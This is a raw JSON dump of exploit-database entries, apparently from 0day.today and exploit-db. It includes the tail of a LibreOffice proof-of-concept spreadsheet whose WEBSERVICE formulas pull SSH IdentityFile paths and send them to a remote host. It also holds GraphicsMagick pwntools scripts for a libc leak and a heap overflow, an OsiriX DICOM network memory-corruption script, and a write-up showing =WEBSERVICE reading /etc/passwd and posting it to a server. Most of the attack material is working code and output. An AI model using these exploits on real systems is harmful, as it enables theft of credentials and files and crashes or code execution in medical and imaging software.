office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\">\r\n <text:p>718</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\">\r\n <text:p>695</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\">\r\n <text:p>682</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\">\r\n <text:p>6</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\">\r\n <text:p>882</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\">\r\n <text:p>860</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\">\r\n <text:p>847</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"7\" calcext:value-type=\"float\">\r\n <text:p>7</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\">\r\n <text:p>1267</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\">\r\n <text:p>1240</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\">\r\n <text:p>1227</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\">\r\n <text:p>8</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\">\r\n <text:p>1408</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\">\r\n <text:p>1383</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\">\r\n <text:p>1370</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\">\r\n <text:p>9</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n </table:table>\r\n <table:named-expressions/>\r\n </office:spreadsheet>\r\n </office:body>\r\n</office:document>\r\n```\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/29774"}, {"lastseen": "2018-04-03T00:19:14", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://0day.today/exploit/description/28948", "id": "1337DAY-ID-28948", "type": "zdt", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow Exploit", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n \r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n \r\nThe vulnerabilities found are:\r\n \r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n \r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n \r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n \r\n \r\nVulnerabilities details\r\n \r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n \r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n \r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n \r\nThe code which triggers the vulnerable code path is:\r\n \r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n \r\n \r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n \r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n \r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n \r\n \r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n \r\n \r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n \r\n \r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n \r\n \r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n \r\n \r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n \r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n \r\nProof of Concept\r\n \r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n \r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n \r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n \r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n \r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n \r\n \r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n \r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n \r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n \r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n \r\n \r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/28948", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-06T09:12:46", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2016-12-16T00:00:00", "published": "2016-12-16T00:00:00", "href": "https://0day.today/exploit/description/26535", "id": "1337DAY-ID-26535", "type": "zdt", "title": "OsiriX DICOM Viewer 8.0.1 - Memory Corruption Exploit", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n#\r\n#\r\n# OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability\r\n#\r\n#\r\n# Vendor: Pixmeo Sarl\r\n# Product web page: http://www.osirix-viewer.com\r\n# Affected version: OsiriX 8.0.1\r\n#\r\n# Summary: With high performance and an intuitive interactive user interface, OsiriX MD is\r\n# the most widely used DICOM viewer in the world. It is the result of more than 10 years of\r\n# research and development in digital imaging. It fully supports the DICOM standard for an\r\n# easy integration in your workflow environment and an open platform for development of\r\n# processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive\r\n# innovative technique for 3D and 4D navigation and a complete integration with any PACS.\r\n# OsiriX MD supports 64-bit computing and multithreading for the best performances on the\r\n# most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled.\r\n#\r\n# Summary2: OsiriX is an image processing application for Mac dedicated to DICOM images\r\n# (\".dcm\" / \".DCM\" extension) produced by equipment (MRI, CT, PET, PET-CT, ...).\r\n# Osirix is complementary to existing viewers, in particular to nuclear medicine viewers.\r\n#\r\n# Desc: The vulnerability is caused due to the usage of vulnerable collection of libraries that\r\n# are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL.\r\n# Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length\r\n# of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can\r\n# overflow the stack and the heap of the process when sending large array of bytes to the presentation\r\n# context item length segment of the DICOM standard, potentially resulting in remote code execution\r\n# and/or denial of service scenario.\r\n#\r\n# -------------------------------------------------------------------------------------\r\n#\r\n# (lldb) \r\n# Process 65202 stopped\r\n# * thread #20: tid = 0x2c5fcc, 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fb5af00fda1)\r\n# frame #0: 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# OsiriX Lite`parseAssociate:\r\n# -> 0x108978441 <+833>: movzbl (%r10), %eax\r\n# 0x108978445 <+837>: cmpl $0x40, %eax\r\n# 0x108978448 <+840>: movq -0x200(%rbp), %rcx\r\n# 0x10897844f <+847>: je 0x108978513 ; <+1043>\r\n# (lldb) bt\r\n# * thread #19: tid = 0x2f6189, 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fab8ac000a1)\r\n# * frame #0: 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# frame #1: 0x0000000102fe4363 OsiriX Lite`AE_6_ExamineAssociateRequest(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, void*) + 339\r\n# frame #2: 0x0000000102fe14ca OsiriX Lite`PRV_StateMachine(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, int, void*) + 314\r\n# frame #3: 0x0000000102fdae9c OsiriX Lite`DUL_ReceiveAssociationRQ(void**, DUL_BLOCKOPTIONS, int, DUL_ASSOCIATESERVICEPARAMETERS*, void**, int) + 4348\r\n# frame #4: 0x0000000102facf1e OsiriX Lite`ASC_receiveAssociation(T_ASC_Network*, T_ASC_Association**, long, void**, unsigned int*, bool, DUL_BLOCKOPTIONS, int) + 462\r\n# frame #5: 0x0000000102c5f28f OsiriX Lite`DcmQueryRetrieveSCP::waitForAssociation(T_ASC_Network*) + 207\r\n# frame #6: 0x0000000102c3f9c7 OsiriX Lite`-[DCMTKQueryRetrieveSCP run] + 4999\r\n# frame #7: 0x0000000102987a37 OsiriX Lite`-[AppController startSTORESCP:] + 519\r\n# frame #8: 0x00007fff975b030d Foundation`__NSThread__start__ + 1243\r\n# frame #9: 0x00007fffab021aab libsystem_pthread.dylib`_pthread_body + 180\r\n# frame #10: 0x00007fffab0219f7 libsystem_pthread.dylib`_pthread_start + 286\r\n# frame #11: 0x00007fffab021221 libsystem_pthread.dylib`thread_start + 13\r\n# (lldb) register read\r\n# General Purpose Registers:\r\n# rax = 0x0000000000000103\r\n# rbx = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# rcx = 0x00006100002e6200\r\n# rdx = 0x000000000001ad41\r\n# rdi = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# rsi = 0x00006100002e6200\r\n# rbp = 0x0000700005a4a670\r\n# rsp = 0x0000700005a4a420\r\n# r8 = 0x0000000000000103\r\n# r9 = 0x00000000fb40cfc6\r\n# r10 = 0x00007fab8ac000a1\r\n# r11 = 0x0000000000000041\r\n# r12 = 0x0000700005a4a6b8\r\n# r13 = 0x00000001044c18f0 OsiriX Lite`EC_Normal\r\n# r14 = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# r15 = 0x0000000000008014\r\n# rip = 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# rflags = 0x0000000000010286\r\n# cs = 0x000000000000002b\r\n# fs = 0x0000000000000000\r\n# gs = 0x0000000000000000\r\n#\r\n# -------------------------------------------------------------------------------------\r\n#\r\n# Tested on: OS X 10.12.2 (Sierra)\r\n# OS X 10.12.1 (Sierra)\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2016-5382\r\n# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5382.php\r\n#\r\n# https://tools.ietf.org/html/rfc3240\r\n# https://github.com/commontk/DCMTK/commit/1b6bb76\r\n#\r\n# 29.11.2016\r\n#\r\n \r\n \r\nimport sys, socket\r\n \r\nhello = ('\\x01\\x00\\x00\\x00\\x80\\x71\\x00\\x01\\x00\\x00\\x4f\\x52\\x54\\x48'\r\n '\\x41\\x4e\\x43\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4a\\x4f'\r\n '\\x58\\x59\\x50\\x4f\\x58\\x59\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x15\\x31\\x2e\\x32\\x2e\\x38\\x34'\r\n '\\x30\\x2e\\x31\\x30\\x30\\x30\\x38\\x2e\\x33\\x2e\\x31\\x2e\\x31\\x2e'\r\n '\\x31\\x20\\x00\\x80\\x00')\r\n \r\nbye = ('\\x50\\x00\\x00\\x0c\\x51\\x00\\x00\\x04\\x00\\x00\\x07\\xde'\r\n '\\x52\\x00\\x00\\x00')\r\n \r\nbuffer = '\\x41\\x42\\x43\\x44' * 10000\r\n \r\nif len(sys.argv) < 3:\r\n print '\\nUsage: ' +sys.argv[0]+ ' <target> <port>'\r\n print 'Example: ' +sys.argv[0]+ ' 172.19.0.214 11112\\n'\r\n sys.exit(0)\r\n \r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnect = s.connect((host, port))\r\ns.settimeout(251)\r\ns.send(hello+buffer+bye)\r\ns.close\n\n# 0day.today [2018-02-06] #", "sourceHref": "https://0day.today/exploit/26535", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-02-12T13:36:08", "bulletinFamily": "exploit", "description": "LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure. CVE-2018-6871. Remote exploit for Linux platform", "modified": "2018-02-10T00:00:00", "published": "2018-02-10T00:00:00", "id": "EDB-ID:44022", "href": "https://www.exploit-db.com/exploits/44022/", "type": "exploitdb", "title": "LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure", "sourceData": "# Vulnerability description\r\n\r\n[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)\r\n\r\n## First part\r\n\r\nLibreOffice supports COM.MICROSOFT.WEBSERVICE function:\r\n\r\n https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4\r\n\r\nThe function is required to obtain data by URL, usually used as:\r\n\r\n =FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\")\r\n\r\nIn original:\r\n\r\n For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.\r\n\r\nIn LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.\r\n\r\n## Second part\r\n\r\nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.\r\n\r\n# Exploitation\r\n\r\nTo read file you need just:\r\n\r\n =WEBSERVICE(\"/etc/passwd\")\r\n\r\nThis function can also be used to send a file:\r\n\r\n =WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\"))\r\n\r\nFor successful operation, you need to send the files of the current user, so you need to retrieve current user home path.\r\n\r\n =MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\",\r\n\r\nAlso you can parse other files too, like a ~/.ssh/config or something like that.\r\n\r\nFor other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).\r\n\r\n# Impact\r\n\r\nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.\r\n\r\n# Acknowledgment\r\n\r\nVulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).\r\n\r\n - - -\r\n\r\n# poc.fods\r\n\r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n\r\n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" 